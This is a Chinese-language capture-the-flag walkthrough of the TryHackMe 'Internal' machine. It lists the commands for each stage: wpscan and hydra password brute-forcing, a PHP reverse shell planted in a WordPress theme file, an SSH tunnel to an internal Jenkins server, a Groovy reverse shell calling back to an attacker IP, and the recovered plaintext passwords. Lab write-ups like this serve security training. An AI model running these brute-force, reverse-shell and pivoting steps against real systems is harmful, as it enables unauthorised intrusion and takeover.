THM-Internal
靶机ip:10.10.27.141
写在前面
要将internal.thm
添加到/etc/hosts
文件中
信息收集
nmap扫描
nmap --min-rate 10000 -sS -sV -sC 10.10.27.141 -oN reports/nmap
发现开放22端口和80端口
80端口
是一个apache
的初始页面,扫描一下目录
gobuster dir -u http://internal.thm -w /usr/share/wordlists/dirb/common.txt
访问一下
/blog
/javascript
/phpmyadmin
/wordpress
不难看出,这是一个wordpress
的界面,wordpress
和blog
是一个页面,这里以/blog
为主,同时还有个phpMyAdmin
获取初始shell
登录wordpress
先看下phpMyAdmin
查看源码发现版本号是4.6.6
,通过searchsploit
搜索后发现没有什么可以利用的,将注意力转移到wordpress
使用wpscan
扫描一下
wpscan --url http://internal.thm/blog/ -e
发现有个admin账户,尝试破解一下密码
wpscan --url http://internal.thm/blog/ -U admin -P /usr/share/wordlists/rockyou.txt
爆破成功,找到了admin
账户的密码my2boys
成功登录
shell获取
在这里发现可以随意更改文件内容。这里将404.php
内容改成反弹shell的文件是php-reverse-shell,修改ip
和port
点击下买你的更新文件。然后在kali上创建监听
现在需要找到404.php
文件的位置,从路由中可以看到主题是twentyseventeen
,而且大多数主题位于wp-content
目录下,主题位于/wp-content/themes
目录下,所以404.php
文件的位置是:/wp-content/themes/twentyseventeen/404.php
访问文件http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
这样我们就拿到了低权用户的shell
先获取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
在/home
目录下有个aubreanna
用户,现在目标就是提升至user权限
提升至user权限
在翻阅目录的过程中发现在 /opt
目录下有个wp-save.txt
文件,并且这是我们可以查看的文件,查看一下
得到了aubreanna
用户的密码bubb13guM!@#123
,登录aubreanna
用户
成功登录
在/home/aubreanna
下找到user.txt
提升至root权限
发现在这个目录还有jenkins.txt
文件,查看一下
告诉我们内网Jenkins
服务的地址是172.17.0.2:8080
先简单看一下服务
curl http://172.17.0.2:8080
由于目标机器的端口8080
只能通过目标机的本地进行访问,所以我们需要设置SSH端口转发,从而将目标机器8080
端口上的流量重定向到我们本地攻击机上的地址和端口localhost:8081
,在攻击机上的终端界面构造如下命令
1 | ssh -f -N -L 8081:172.17.0.2:8080 aubreanna@internal.thm |
输入密码后即可访问服务
网上的默认密码无法登录,这里使用hydra
暴力破解,先找到登录框的表单内容
找到后就可以构造命令了
1 | hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8081 127.0.0.1 http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" |
成功爆破出密码spongebob
成功登录!
在管理界面,有一个可以执行命令的地方,在攻击机先建立监听
然后再执行反弹shell的命令
1 | String host="10.11.101.220"; |
拿到jenkins
的shell
转到交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
依旧是在老位置/opt
下找到note.txt
得到root
用户的密码:tr0ub13guM!@#123
直接ssh
登录root
ssh root@10.10.27.141
成功登录
在当前目录找到root.txt